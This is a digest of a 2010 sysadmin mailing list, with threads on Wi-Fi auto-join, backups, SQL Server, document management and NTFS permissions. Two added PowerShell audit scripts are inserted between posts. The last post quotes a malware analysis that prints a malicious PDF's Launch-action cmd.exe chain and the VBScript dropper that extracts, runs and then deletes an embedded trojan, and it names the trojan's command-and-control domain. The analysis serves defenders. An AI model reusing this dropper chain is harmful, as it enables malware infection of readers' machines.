> "linksys" (rare, I know) with pretty much any device and then come within
> range of a different network named "linksys" will it automatically connect?
> I am asking because I honestly don't know.  For me, it's a bigger question
> of being aware of how your device is configured and from where you are
> getting your internet access.
>
>  --
> *From:* David Lum [mailto:david@nwea.org]
> *Sent:* Wednesday, April 28, 2010 3:21 PM
> *To:* NT System Admin Issues
> *Subject:* Anyone see a problem?
>
>"Typically, an iPhone will look for a specific MAC address--the unique
> identifier for the router--to verify that the wireless network is a device a
> user agreed to join previously. However, if the iPhone has previously
> connected to any one of the numerous free AT&T Wi-Fi hot spots (offered at
> virtually every Starbucks in the U.S., for example) the device will ignore
> what the MAC address says and simply connect to the network if it has "AT&T
> Wifi" attached, Kamkar said".
>
>
>
> http://news.cnet.com/8301-27080_3-20003455-245.html?tag=mncol;title
>
> David Lum // SYSTEMS ENGINEER
> NORTHWEST EVALUATION ASSOCIATION
> (Desk) 971.222.1025 // (Cell) 503.267.9764
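The behaviour described in this thread (a saved network is matched by its name and security settings, not by the access point) can be audited on a Windows client. The following PowerShell is an added example, not part of any list member's post; the function names are hypothetical, the two sample profiles are constructed, and it assumes the profile XML that `netsh wlan export profile` writes.

```powershell
# Added example: audit saved Wi-Fi profiles for "auto-join by name" exposure.
# Function names are hypothetical; the sample profiles at the end are constructed.

function Get-XmlText {
    # Returns the text of the element at the given path, ignoring XML namespaces.
    param([xml]$Doc, [string[]]$Path)
    $xpath = '/' + (($Path | ForEach-Object { "*[local-name()='$_']" }) -join '/')
    $node = $Doc.SelectSingleNode($xpath)
    if ($null -ne $node) { $node.InnerText.Trim() } else { $null }
}

function Test-WlanProfile {
    # Classifies one exported WLAN profile (XML text) by how the client will match it.
    param([Parameter(Mandatory)][string]$ProfileXml)
    $doc  = [xml]$ProfileXml
    $ssid = Get-XmlText -Doc $doc -Path 'WLANProfile','SSIDConfig','SSID','name'
    $mode = Get-XmlText -Doc $doc -Path 'WLANProfile','connectionMode'
    $auth = Get-XmlText -Doc $doc -Path 'WLANProfile','MSM','security','authEncryption','authentication'
    if (-not $mode) { $mode = 'auto' }   # conservative assumption when the element is absent

    if ($mode -ne 'auto') {
        $risk = 'Low';    $why = 'connects only when the user asks'
    } elseif ($auth -eq 'open') {
        $risk = 'High';   $why = 'auto-joins any AP advertising this name; no credential involved'
    } elseif ('WPAPSK','WPA2PSK' -contains $auth) {
        $risk = 'Medium'; $why = 'auto-joins any AP with this name and the same shared passphrase'
    } else {
        $risk = 'Low';    $why = 'auto-join, but authentication is neither open nor pre-shared key'
    }
    [pscustomobject]@{
        SSID = $ssid; ConnectionMode = $mode; Authentication = $auth; Risk = $risk; Reason = $why
    }
}

function Get-SavedWlanProfileRisk {
    # Exports every saved profile (keys stay encrypted because key=clear is not used),
    # classifies each one, then deletes the export.
    param([string]$ExportDir = (Join-Path $env:TEMP 'wlan-audit'))
    if ($ExportDir -match '\s') { throw 'Use an export path without spaces.' }
    New-Item -ItemType Directory -Path $ExportDir -Force | Out-Null
    try {
        & netsh.exe wlan export profile "folder=$ExportDir" | Out-Null
        Get-ChildItem -LiteralPath $ExportDir -Filter *.xml | ForEach-Object {
            Test-WlanProfile -ProfileXml (Get-Content -LiteralPath $_.FullName -Raw)
        }
    } finally {
        Remove-Item -LiteralPath $ExportDir -Recurse -Force
    }
}

# Constructed sample: an open network saved with automatic connection.
$constructedOpen = @'
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>linksys</name>
  <SSIDConfig><SSID><name>linksys</name></SSID></SSIDConfig>
  <connectionType>ESS</connectionType>
  <connectionMode>auto</connectionMode>
  <MSM><security><authEncryption>
    <authentication>open</authentication>
    <encryption>none</encryption>
    <useOneX>false</useOneX>
  </authEncryption></security></MSM>
</WLANProfile>
'@

# Constructed sample: the same profile rewritten as a manual-connect WPA2-PSK network.
$constructedPsk = $constructedOpen -replace 'linksys', 'office'
$constructedPsk = $constructedPsk -replace '>auto<', '>manual<'
$constructedPsk = $constructedPsk -replace '>open<', '>WPA2PSK<'
$constructedPsk = $constructedPsk -replace '>none<', '>AES<'

# Offline run over the samples; use Get-SavedWlanProfileRisk on a real client.
$constructedOpen, $constructedPsk |
    ForEach-Object { Test-WlanProfile -ProfileXml $_ } |
    Format-Table SSID, ConnectionMode, Authentication, Risk -AutoSize
```

A profile reported as High can be switched to manual with `netsh wlan set profileparameter name="<profile>" connectionmode=manual` or removed with `netsh wlan delete profile name="<profile>"`.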

RE: Anyone see a problem?

2010-04-28 Thread Mayo, Bill
Is this unique?  In other words, if you connect to a wi-fi network named
"linksys" (rare, I know) with pretty much any device and then come
within range of a different network named "linksys" will it
automatically connect?  I am asking because I honestly don't know.  For
me, it's a bigger question of being aware of how your device is
configured and from where you are getting your internet access.



From: David Lum [mailto:david@nwea.org] 
Sent: Wednesday, April 28, 2010 3:21 PM
To: NT System Admin Issues
Subject: Anyone see a problem?



"Typically, an iPhone will look for a specific MAC address--the unique
identifier for the router--to verify that the wireless network is a
device a user agreed to join previously. However, if the iPhone has
previously connected to any one of the numerous free AT&T Wi-Fi hot
spots (offered at virtually every Starbucks in the U.S., for example)
the device will ignore what the MAC address says and simply connect to
the network if it has "AT&T Wifi" attached, Kamkar said".

 

http://news.cnet.com/8301-27080_3-20003455-245.html?tag=mncol;title

David Lum // SYSTEMS ENGINEER 
NORTHWEST EVALUATION ASSOCIATION
(Desk) 971.222.1025 // (Cell) 503.267.9764

 

 

 



Re: Document Management Systems

2010-04-28 Thread Roger Wright
We'd probably start with a "going forward" methodology, not worrying
about existing files.

More concerned with files that are currently in electronic format
(.xls, .pdf, .jpg, etc.) than in paper format.  Those that are paper
would have to be scanned and indexed along with the related electronic
files.


Die dulci fruere!

Roger Wright
___




On Wed, Apr 28, 2010 at 3:00 PM, Ray  wrote:
> Full text retrieval? What about existing documents, both printed and
> non-printed?
>
> -Original Message-
> From: Raper, Jonathan - Eagle [mailto:jra...@eaglemds.com]
> Sent: Wednesday, April 28, 2010 11:21 AM
> To: NT System Admin Issues
> Subject: RE: Document Management Systems
>
> +1 - I'm looking for this kind of information as well.
>
> We're looking to leverage the fax server built into our Electronic Medical
> Record system to handle administrative/non-clinical information in order to
> minimize the receipt of paper faxing altogether, if possible. This would
> require a third party application to grab the documents from the fax server.
> Taking it a step further, I could see the possible assigning of fax numbers
> to individuals, but we've got to have a workable solution in place first.
> I'm sure whatever we decide on would be able to do much more than that, but
> that would be our entry point.
>
> Jonathan L. Raper, A+, MCSA, MCSE
> Technology Coordinator
> Eagle Physicians & Associates, PA
> jra...@eaglemds.com
> www.eaglemds.com
>
>
> -Original Message-
> From: Roger Wright [mailto:rhw...@gmail.com]
> Sent: Wednesday, April 28, 2010 2:11 PM
> To: NT System Admin Issues
> Subject: Document Management Systems
>
> My company is beginning to look at some type of document management
> system for ease of access, DR, and litigation compliance.  One thing
> we've determined is that we need to decide on a retention policy
> before going much further.  Other than that, we don't know whether an
> in-house or hosted solution would be best, or if it's even a
> cost-effective option to pursue.
>
> Any one care to share how you've made the transition from paper to
> electronic document management?
> Perhaps some lessons learned or "solutions" to avoid?
>
> TIA...
>
>
> Die dulci fruere!
>
> Roger Wright
> ___
>
> Any medical information contained in this electronic message is CONFIDENTIAL
> and privileged. It is unlawful for unauthorized persons to view, copy,
> disclose, or disseminate CONFIDENTIAL information. This electronic message
> may contain information that is confidential and/or legally privileged. It
> is intended only for the use of the individual(s) and/or entity named as
> recipients in the message. If you are not an intended recipient of this
> message, please notify the sender immediately and delete this material from
> your computer. Do not deliver, distribute or copy this message, and do not
> disclose its contents or take any action in reliance on the information that
> it contains.
>



RE: Anyone see a problem?

2010-04-28 Thread Don Guyer
Yes I do! Who, in their right mind, pays $5 for a cup of coffee?!

 

:)

 

Don Guyer

Systems Engineer - Information Services

Prudential, Fox & Roach/Trident Group

431 W. Lancaster Avenue

Devon, PA 19333

Direct: (610) 993-3299

Fax: (610) 650-5306

don.gu...@prufoxroach.com  

 

From: David Lum [mailto:david@nwea.org] 
Sent: Wednesday, April 28, 2010 3:21 PM
To: NT System Admin Issues
Subject: Anyone see a problem?

 

"Typically, an iPhone will look for a specific MAC address--the unique
identifier for the router--to verify that the wireless network is a
device a user agreed to join previously. However, if the iPhone has
previously connected to any one of the numerous free AT&T Wi-Fi hot
spots (offered at virtually every Starbucks in the U.S., for example)
the device will ignore what the MAC address says and simply connect to
the network if it has "AT&T Wifi" attached, Kamkar said".

 

http://news.cnet.com/8301-27080_3-20003455-245.html?tag=mncol;title

David Lum // SYSTEMS ENGINEER 
NORTHWEST EVALUATION ASSOCIATION
(Desk) 971.222.1025 // (Cell) 503.267.9764

 

 

 


Re: RE: SQL Server 2005 management suite

2010-04-28 Thread Andrew S. Baker
Don't install SSMSE *on* the SQL server if you ever intend to install the
full version later.

Manage it remotely instead

-ASB: http://XeeSM.com/AndrewBaker

Sent from my Motorola Droid

On Apr 28, 2010 1:58 PM,  wrote:


Thanks!  I didn't notice that last part..

"SSMSE can also manage instances of the SQL Server Database Engine created
by any edition of SQL Server 2005."
-- 
RMc

Jay Dale  wrote on 04/28/2010 12:31:04 PM:



> Is this what you need?

>
> http://www.microsoft.com/downloads/details.aspx?
> displaylang=en&FamilyID=c243a5ae-4bd1-4e3d...


Anyone see a problem?

2010-04-28 Thread David Lum
"Typically, an iPhone will look for a specific MAC address--the unique 
identifier for the router--to verify that the wireless network is a device a 
user agreed to join previously. However, if the iPhone has previously connected 
to any one of the numerous free AT&T Wi-Fi hot spots (offered at virtually 
every Starbucks in the U.S., for example) the device will ignore what the MAC 
address says and simply connect to the network if it has "AT&T Wifi" attached, 
Kamkar said".

http://news.cnet.com/8301-27080_3-20003455-245.html?tag=mncol;title
David Lum // SYSTEMS ENGINEER
NORTHWEST EVALUATION ASSOCIATION
(Desk) 971.222.1025 // (Cell) 503.267.9764



Re: backup software solution for offsite

2010-04-28 Thread justino garcia
Right it access VIA ipsec to the NAS.
using BSD firewalls on both ends.
Pfsense IPSEC.

VPN/IPSEC both ends

The current backup software / application is acronis( not doing a great job,
offsite).


On Wed, Apr 28, 2010 at 2:19 PM, Charlie Kaiser
wrote:

> OK. So how do you access it now? VPN? Direct RDP? Local only? Sounds like
> you need two separate configs; one is the VPN/IPSEC connectivity, and the
> other is the backup application.
>
> Create the tunnel to the NAS device using your connectivity method of
> choice.
>
> Then run the backup locally and do either a copy job (like backup exec
> provides) or manually script a copy up to the NAS. The big hurdle you're
> going to run into is trying to copy large files across that link quickly
> and reliably.
>
> Image files present a big challenge since even small changes result in new
> image files that must be uploaded separately.
>
> There are 3rd party tools that can accommodate this, but I don't have a
> specific recommendation. I haven't found one that I like.
>
> Another thing to watch for will be data transfer windows. Depending on the
> size of the upload and the link speed, you could easily run into an
> overlap...
>
> I've had clients want something like this and we have always either moved
> media physically using a manual offsite service like Iron Mountain or
> Datasafe or used Amazon or Mozy. We ran into too many hurdles with
> bandwidth utilization and time windows.
>
> Perhaps someone else has a better solution based on their experience...
>
> ***
> Charlie Kaiser
> charl...@golden-eagle.org
> Kingman, AZ
> ***
>
> > -Original Message-
> > From: justino garcia [mailto:jgarciaitl...@gmail.com]
> > Sent: Wednesday, April 28, 2010 10:34 AM
> > To: NT System Admin Issues
> > Subject: Re: backup software solution for offsite
> >
> > I host a server, in a rack, at some one else data-center ( I
> > rent a rack).
> >
> > In the rack, I have a Network Attached storage devices, and
> > some other servers. Clients would like for it to go there,
> > and so would I.
> >
> >
> > On Wed, Apr 28, 2010 at 1:30 PM, Charlie Kaiser
> >  wrote:
> >
> >
> >   Are you saying your OWN datacenter? Or a hosted server in someone else's
> >   datacenter?
> >
> >
> >   ***
> >   Charlie Kaiser
> >   charl...@golden-eagle.org
> >   Kingman, AZ
> >   ***
> >
> >   > -Original Message-
> >   > From: justino garcia [mailto:jgarciaitl...@gmail.com]
> >
> >   > Sent: Wednesday, April 28, 2010 10:19 AM
> >   > To: NT System Admin Issues
> >
> >   > Subject: Re: backup software solution for offsite
> >   >
> >   > I wish to not hosted on a third party cloud, rather just host
> >   > on our own server at the data center.
> >   > and Mozy good, but we want a image snapshot.
> >   >
> >   > Thanks
> >   >
> >   >
> >   > On Wed, Apr 28, 2010 at 1:15 PM, Charlie Kaiser
> >   >  wrote:
> >   >
> >   >
> >   >   Check out Mozy Pro (Mozy.com) or Amazon Web Services.
> >   >
> >   >   ***
> >   >   Charlie Kaiser
> >   >   charl...@golden-eagle.org
> >   >   Kingman, AZ
> >   >   ***
> >   >
> >   >
> >   >   > -Original Message-
> >   >   > From: justino garcia [mailto:jgarciaitl...@gmail.com]
> >   >   > Sent: Wednesday, April 28, 2010 10:08 AM
> >   >   > To: NT System Admin Issues
> >   >   > Subject: backup software solution for offsite
> >   >   >
> >   >   > I have a need to setup offsite backups via a ipsec tunnel,
> >   >   > thru sftp ftp or smb .
> >   >   > Something we can take daily inc snapshots and send over the
> >   >   > internet using vpn, that has retention rules and alerts to
> >   >   > admin (me) if a backup fails.
> >   >   > Any commercial product any ideas?
> >   >   >
> >   >   > Thanks
> >   >   >
> >   >   >
> >   >   > --
> >   >   > Justin
> >   >   > IT-TECH
> >   >   >
> >   > --
> >   > Justin
> >   > IT-TECH

Re: sig pad for Word

2010-04-28 Thread Kevin Lundy
What, you don't want to spend $50 for every client to get a digital ID?


On Wed, Apr 28, 2010 at 3:07 PM, James Kerr  wrote:

>  Well, it's for our clients to sign off on medical consent forms.
>
> - Original Message -
> *From:* Kevin Lundy 
> *To:* NT System Admin Issues 
> *Sent:* Wednesday, April 28, 2010 3:05 PM
> *Subject:* Re: sig pad for Word
>
> Have you considered digital signatures?
>
> On Wed, Apr 28, 2010 at 2:46 PM, James Kerr  wrote:
>
>>  Can anyone recommend an inexpensive USB signature pad for signing word
>> documents?
>>
>> James

Re: Document Management Systems

2010-04-28 Thread Philip Brothwell
Take a look at DocuShare.  http://docushare.xerox.com/

I've used it at a couple of companies and it worked well for us.




On Wed, Apr 28, 2010 at 2:10 PM, Roger Wright  wrote:

> My company is beginning to look at some type of document management
> system for ease of access, DR, and litigation compliance.  One thing
> we've determined is that we need to decide on a retention policy
> before going much further.  Other than that, we don't know whether an
> in-house or hosted solution would be best, or if it's even a
> cost-effective option to pursue.
>
> Any one care to share how you've made the transition from paper to
> electronic document management?
> Perhaps some lessons learned or "solutions" to avoid?
>
> TIA...
>
>
> Die dulci fruere!
>
> Roger Wright
> ___
>

Re: The finer points of NTFS ACLs (was: Software installs on new PCs)

2010-04-28 Thread Andrew S. Baker
Copy the files to the new location. Or, reapply the perms by script

-ASB: http://XeeSM.com/AndrewBaker

Sent from my Motorola Droid

On Apr 28, 2010 12:45 PM, "Ben Scott"  wrote:

On Wed, Apr 28, 2010 at 11:54 AM, James Rankin wrote:
> We see this problem where people create folders under shared drives, that
> each new folder is owned by the creating user who then has the added rights.
> The solution is some weekly subinacl tasks that re-take ownership of the
> whole fileserver structure back to BUILTIN\Administrators

 Wouldn't it be better to just remove "CREATOR OWNER" from the ACL on
the folder?

 All our shared folders are set so only the group(s) which should
have permission are present.

 The only good use for "CREATOR OWNER" I've found is kludging around
apps that insist on writing to their own program directory.  So grant
users "Create File" on "This folder only", and separately grant
"CREATOR OWNER" "Modify" on "Files only".  Now users can create the
file, but can't touch anything else.

 My biggest beef is that if you move an object within a "drive" on
Windows, Windows does not update the ACL on the object to reflect
different permissions in its new location.  So, for example, when a
file is moved from the QA-only pre-release folder to the whole-company
general-release folder, the file still has permissions for pre-release
and nobody else can read it.  Anyone got a fix for *that*?

-- Ben

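One way to act on the two suggestions in this thread (take "CREATOR OWNER" off shared folders, and reapply permissions by script after a move within the same drive), as an added PowerShell example that is not from any list member's post. The function names and the paths in the usage comments are hypothetical; the mismatch check compares only which identities hold inherited ACEs, so it is a heuristic, and the reset has to run under an account that is allowed to change the ACL.

```powershell
# Added example. Function names and the paths in the usage comments are hypothetical.
$SidType       = [System.Security.Principal.SecurityIdentifier]
$CreatorOwner  = 'S-1-3-0'   # well-known SID of CREATOR OWNER (same on every locale)
$ObjectInherit = [System.Security.AccessControl.InheritanceFlags]::ObjectInherit

function Find-CreatorOwnerAce {
    # Lists folders at or below $Root that carry an explicit CREATOR OWNER ACE,
    # so each one can be reviewed and removed where it is not needed.
    param([Parameter(Mandatory)][string]$Root)
    $folders = @(Get-Item -LiteralPath $Root) +
               @(Get-ChildItem -LiteralPath $Root -Directory -Recurse -ErrorAction SilentlyContinue)
    foreach ($dir in $folders) {
        $acl = Get-Acl -LiteralPath $dir.FullName
        foreach ($rule in $acl.GetAccessRules($true, $false, $SidType)) {
            if ($rule.IdentityReference.Value -eq $CreatorOwner) {
                [pscustomobject]@{
                    Folder      = $dir.FullName
                    Type        = $rule.AccessControlType
                    Rights      = $rule.FileSystemRights
                    AppliesTo   = $rule.InheritanceFlags
                    Propagation = $rule.PropagationFlags
                }
            }
        }
    }
}

function Find-StaleInheritedAcl {
    # Flags files in $Folder whose ACL does not look like it came from $Folder:
    # inheritance switched off, explicit ACEs present, or inherited ACEs held by
    # a different set of identities than the folder would hand down to files.
    param([Parameter(Mandatory)][string]$Folder)
    $parentAcl   = Get-Acl -LiteralPath $Folder
    $inheritable = @($parentAcl.GetAccessRules($true, $true, $SidType) |
                     Where-Object { $_.InheritanceFlags.HasFlag($ObjectInherit) })
    foreach ($file in Get-ChildItem -LiteralPath $Folder -File) {
        $acl   = Get-Acl -LiteralPath $file.FullName
        $owner = $acl.GetOwner($SidType).Value
        # On a file, an inherited CREATOR OWNER ACE shows up under the owner's SID.
        $expected = @($inheritable | ForEach-Object {
                          $sid = $_.IdentityReference.Value
                          if ($sid -eq $CreatorOwner) { $owner } else { $sid }
                      } | Sort-Object -Unique)
        $actual   = @($acl.GetAccessRules($false, $true, $SidType) |
                      ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique)
        $explicit = @($acl.GetAccessRules($true, $false, $SidType))

        $reasons = @()
        if ($acl.AreAccessRulesProtected) { $reasons += 'inheritance disabled' }
        if ($explicit.Count -gt 0)        { $reasons += 'explicit ACEs' }
        if (($expected -join ',') -ne ($actual -join ',')) {
            $reasons += 'inherited ACEs do not match parent'
        }
        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Path     = $file.FullName
                Reasons  = $reasons -join '; '
                Expected = $expected -join ','
                Actual   = $actual -join ','
            }
        }
    }
}

function Reset-InheritedAcl {
    # Replaces the item's ACL with the ACEs inherited from its current parent.
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory, ValueFromPipelineByPropertyName)][string]$Path)
    process {
        if ($PSCmdlet.ShouldProcess($Path, 'icacls /reset')) {
            & icacls.exe $Path /reset /C | Out-Null
            if ($LASTEXITCODE -ne 0) {
                Write-Warning "icacls failed for $Path (exit code $LASTEXITCODE)"
            }
        }
    }
}

# Usage (hypothetical paths); review the -WhatIf output before running without it:
#   Find-CreatorOwnerAce -Root 'D:\Shares'
#   Find-StaleInheritedAcl -Folder 'D:\Shares\Release\General' | Reset-InheritedAcl -WhatIf
```

Run from a scheduled task under an administrative account, this covers files that were moved into a folder and kept the permissions of their old location.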

Re: sig pad for Word

2010-04-28 Thread James Kerr
Well, it's for our clients to sign off on medical consent forms.
  - Original Message - 
  From: Kevin Lundy 
  To: NT System Admin Issues 
  Sent: Wednesday, April 28, 2010 3:05 PM
  Subject: Re: sig pad for Word


  Have you considered digital signatures?


  On Wed, Apr 28, 2010 at 2:46 PM, James Kerr  wrote:

Can anyone recommend an inexpensive USB signature pad for signing word
documents?

James

Re: sig pad for Word

2010-04-28 Thread Kevin Lundy
Have you considered digital signatures?

On Wed, Apr 28, 2010 at 2:46 PM, James Kerr  wrote:

> Can anyone recommend an inexpensive USB signature pad for signing Word
> documents?
>
> James

RE: Document Management Systems

2010-04-28 Thread Ray
Full text retrieval? What about existing documents, both printed and
non-printed?   

-Original Message-
From: Raper, Jonathan - Eagle [mailto:jra...@eaglemds.com] 
Sent: Wednesday, April 28, 2010 11:21 AM
To: NT System Admin Issues
Subject: RE: Document Management Systems

+1 - I'm looking for this kind of information as well.

We're looking to leverage the fax server built into our Electronic Medical
Record system to handle administrative/non-clinical information in order to
minimize the receipt of paper faxing altogether, if possible. This would
require a third party application to grab the documents from the fax server.
Taking it a step further, I could see the possible assigning of fax numbers
to individuals, but we've got to have a workable solution in place first.
I'm sure whatever we decide on would be able to do much more than that, but
that would be our entry point.

Jonathan L. Raper, A+, MCSA, MCSE
Technology Coordinator
Eagle Physicians & Associates, PA
jra...@eaglemds.com
www.eaglemds.com


-Original Message-
From: Roger Wright [mailto:rhw...@gmail.com]
Sent: Wednesday, April 28, 2010 2:11 PM
To: NT System Admin Issues
Subject: Document Management Systems

My company is beginning to look at some type of document management
system for ease of access, DR, and litigation compliance.  One thing
we've determined is that we need to decide on a retention policy
before going much further.  Other than that, we don't know whether an
in-house or hosted solution would be best, or if it's even a
cost-effective option to pursue.

Any one care to share how you've made the transition from paper to
electronic document management?
Perhaps some lessons learned or "solutions" to avoid?

TIA...


Die dulci fruere!

Roger Wright
___



RE: SQL Server 2005 management suite

2010-04-28 Thread paul d

Express Studio doesn't automate backups though.  You can back up but you can't
schedule it like with the 'full' studio.
You can install from the SQL Server disks.  That's what I did when I had to set
up the studio on a couple of pc's.

To: ntsysadmin@lyris.sunbelt-software.com
Subject: RE: SQL Server 2005 management suite
From: richardmccl...@aspca.org
Date: Wed, 28 Apr 2010 12:58:04 -0500

Thanks!  I didn't notice that last part..

"SSMSE can also manage instances of the SQL Server
Database Engine created by any edition of SQL Server 2005."

--
RMc

Jay Dale  wrote on 04/28/2010 12:31:04 PM:

> Is this what you need?
>
> http://www.microsoft.com/downloads/details.aspx?displaylang=en&FamilyID=c243a5ae-4bd1-4e3d-94b8-5a0f62bf7796
>
> Jay Dale
> I.T. Manager, 3GiG
> Mobile: 713.299.2541
> Email: jay.d...@3-gig.com


> From: richardmccl...@aspca.org [mailto:richardmccl...@aspca.org]
> Sent: Wednesday, April 28, 2010 11:40 AM
> To: NT System Admin Issues
> Subject: SQL Server 2005 management suite
>
> Greetings!
>
> I have a server (Win 2003) with MS SQL Server 2005 (not "Express")
> on it as a part of my VMWare management system.  I need to back up
> this database.  It does _not_ have the "Management Suite" installed.
> I do not believe I have the license key for that installation, either.
>
> I happen to have a set of SQL Server disks (2 CD, 1 DVD, one "MS
> Library" CD).  I also have the download for SQL Server 2005 Express
> Management Suite.
>
> What is the least bad way to get MS management (again, just for DB
> backup) onto this machine?
>
> I figure the "Express" version will not work with "Full" SQL Server, right?
>
> If I were to use one of the "Full" setup disks and run "Setup",
> would I have the option of modifying (ie, adding Management Suite) to
> the current install and existing database?  Is this reasonably safe to do?
>
> I've obviously never run SQL Server setup before - thanks!
> --
> Richard D. McClary
> Systems Administrator, Information Technology Group
> ASPCA®
> 1717 S. Philo Rd, Ste 36
> Urbana, IL  61802
>
> richardmccl...@aspca.org
>
> P: 217-337-9761
> C: 217-417-1182
> F: 217-337-9761
> www.aspca.org


Re: sig pad for Word

2010-04-28 Thread Steve Ens
I have an old Wacom that works great for it...probably find used ones on
Ebay for cheap.

On Wed, Apr 28, 2010 at 1:46 PM, James Kerr  wrote:

> Can anyone recommend an inexpensive USB signature pad for signing Word
> documents?
>
> James

RE: backup software solution for offsite

2010-04-28 Thread Sam Cayze
+1.

I use standard products for backups, and then a mix of scripts and
3rd-party products to transfer those backups over the wire.
Rsync, SyncBack, DeltaCopy are a few names...

-Original Message-
From: Charlie Kaiser [mailto:charl...@golden-eagle.org] 
Sent: Wednesday, April 28, 2010 1:19 PM
To: NT System Admin Issues
Subject: RE: backup software solution for offsite

OK. So how do you access it now? VPN? Direct RDP? Local only? Sounds
like you need two separate configs; one is the VPN/IPSEC connectivity,
and the other is the backup application.

Create the tunnel to the NAS device using your connectivity method of
choice.

Then run the backup locally and do either a copy job (like backup exec
provides) or manually script a copy up to the NAS. The big hurdle you're
going to run into is trying to copy large files across that link quickly
and reliably. 

Image files present a big challenge since even small changes result in
new image files that must be uploaded separately.

There are 3rd party tools that can accommodate this, but I don't have a
specific recommendation. I haven't found one that I like.

Another thing to watch for will be data transfer windows. Depending on
the size of the upload and the link speed, you could easily run into an
overlap...

I've had clients want something like this and we have always either
moved media physically using a manual offsite service like Iron Mountain
or Datasafe or used Amazon or Mozy. We ran into too many hurdles with
bandwidth utilization and time windows.

Perhaps someone else has a better solution based on their experience...

***
Charlie Kaiser
charl...@golden-eagle.org
Kingman, AZ
***  

> -Original Message-
> From: justino garcia [mailto:jgarciaitl...@gmail.com]
> Sent: Wednesday, April 28, 2010 10:34 AM
> To: NT System Admin Issues
> Subject: Re: backup software solution for offsite
>
> I host a server, in a rack, at someone else's data center (I rent a
> rack).
>
> In the rack, I have a Network Attached storage devices, and some other
> servers. Clients would like for it to go there, and so would I.
>
> On Wed, Apr 28, 2010 at 1:30 PM, Charlie Kaiser  wrote:
>
>   Are you saying your OWN datacenter? Or a hosted server in someone
>   else's datacenter?
>
>   ***
>   Charlie Kaiser
>   charl...@golden-eagle.org
>   Kingman, AZ
>   ***
>
>   > -Original Message-
>   > From: justino garcia [mailto:jgarciaitl...@gmail.com]
>   > Sent: Wednesday, April 28, 2010 10:19 AM
>   > To: NT System Admin Issues
>   > Subject: Re: backup software solution for offsite
>   >
>   > I wish to not be hosted on a third party cloud, rather just host
>   > on our own server at the data center.
>   > And Mozy is good, but we want an image snapshot.
>   >
>   > Thanks
>   >
>   > On Wed, Apr 28, 2010 at 1:15 PM, Charlie Kaiser  wrote:
>   >
>   >   Check out Mozy Pro (Mozy.com) or Amazon Web Services.
>   >
>   >   ***
>   >   Charlie Kaiser
>   >   charl...@golden-eagle.org
>   >   Kingman, AZ
>   >   ***
>   >
>   >   > -Original Message-
>   >   > From: justino garcia [mailto:jgarciaitl...@gmail.com]
>   >   > Sent: Wednesday, April 28, 2010 10:08 AM
>   >   > To: NT System Admin Issues
>   >   > Subject: backup software solution for offsite
>   >   >
>   >   > I have a need to setup offsite backups via a ipsec tunnel,
>   >   > thru sftp ftp or smb.
>   >   > Something we can take daily inc snapshots and send over the
>   >   > internet using vpn, that has retention rules and alerts to
>   >   > admin (me) if a backup fails.
>   >   > Any commercial product any ideas?
>   >   >
>   >   > Thanks
>   >   >
>   >   > --
>   >   > Justin
>   >   > IT-TECH
>   >
>   > --
>   > Justin
>   > IT-TECH
>
> --
> Justin
> IT-TECH

Just a heads up if you haven't seen this PDF attack in your workplaces

2010-04-28 Thread Ziots, Edward
http://www.secureworks.com/research/blog/index.php/2010/04/27/your-malware-setting-may-have-changed/

Last night and this morning a number of people received an email that looked
like this:

From: notificati...@yyybank.com
[mailto:notificati...@yyybank.com]
Sent: Tuesday, April 27, 2010 7:47 AM
To: x...@bank.com
Subject: setting for your mailbox are changed

SMTP and POP3 servers for x...@yyybank.com mailbox are changed.
Please carefully read the attached instructions before updating settings.

It contained a file called "doc.pdf". That file was, of course, malicious in
nature. It used the PDF Launch vulnerability to run echo some commands into a
bat file and then bootstrap itself to running the Emold downloader trojan.
Let's take a look.


8 0 obj
<<
 /Type /Action
 /S /Launch
 /Win
 <<
  /F (cmd.exe)
  /P (/c echo Set fso=CreateObject("Scripting.FileSystemObject")
  > script.vbs && echo Set f=fso.OpenTextFile("doc.pdf", 1, True)
  >> script.vbs && echo pf=f.ReadAll
  >> script.vbs && echo s=InStr(pf,"'SS")
  >> script.vbs && echo e=InStr(pf,"'EE")
  >> script.vbs && echo s=Mid(pf,s,e-s)
  >> script.vbs && echo Set z=fso.OpenTextFile("batscript.vbs", 2, True)
  >> script.vbs && echo s = Replace(s,"%","")
  >> script.vbs && echo z.Write(s)
  >> script.vbs && script.vbs && batscript.vbs

This uses cmd.exe to write some lines of text to a file called script.vbs and
then executes script.vbs and batscript.vbs.

Let's look at how script.vbs ends up: 


Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.OpenTextFile("doc.pdf", 1, True)
echo pf=f.ReadAll
echo s=InStr(pf,"'SS")
echo e=InStr(pf,"'EE")
s=Mid(pf,s,e-s)
Set z=fso.OpenTextFile("batscript.vbs", 2, True)
s = Replace(s,"%","")
z.Write(s)

When Script.vbs runs, it opens doc.pdf and looks for the tags "SS" and "EE" to
mark the beginning and end of a section of the pdf. It grabs that section, does
a little bit of text manipulation and then writes the result to batscript.vbs.

Next let's look what's in that tagged section of doc.pdf (that ends up 
batscript.vbs): 


5 0 obj
<< /Length 46 >>
stream
BT
/F1 34 Tf
50 500 Td
(Important Information
doc.pdf)Tj

%'SS
%Dim b
%Function c(d)
%c=chr(d)
%End Function
%b=Array(c(077),c(090),c(144),c(000),c(003),c(000),c(000),c(000),
c(004),c(000),c(000)...
...this line is 248413 characters long...
...c(000),c(000),c(000),c(000 ),"")
%Set fso = CreateObject("Scripting.FileSystemObject")
%Set f = fso.OpenTextFile("game.exe", 2, True)
%For i = 0 To 35328
%f.write(b(i))
%Next
%f.close()
%Set WshShell = WScript.CreateObject("WScript.Shell")
%WshShell.Run "cmd.exe /c game.exe"
%WScript.Sleep 3000
%Set f  = FSO.GetFile("game.exe")
%f.Delete
%Set f  = FSO.GetFile("batscript.vbs")
%f.Delete
%Set f  = FSO.GetFile("script.vbs")
%f.Delete
%'EE
endstream

We can now see that the array stored in b is actually an obfuscated executable
file that is stored in game.exe. After running game.exe this script (executed
in batscript.vbs) cleans up after itself by removing game.exe, batscript.vbs,
and script.vbs.

Game.exe is the Emold trojan. This is a generic downloader which can be used to
install any number of second stage trojans. It can be identified by the
presence of the file C:/Program Files/Microsoft Common/svchost.exe, the
registry key "software\Microsoft\Windows NT\CurrentVersion\Image File Execution
Options\explorer.exe", and because it phones home to (currently) jademason.com.

Adobe has said that the Launch functionality is a feature, not a bug. Adobe is 
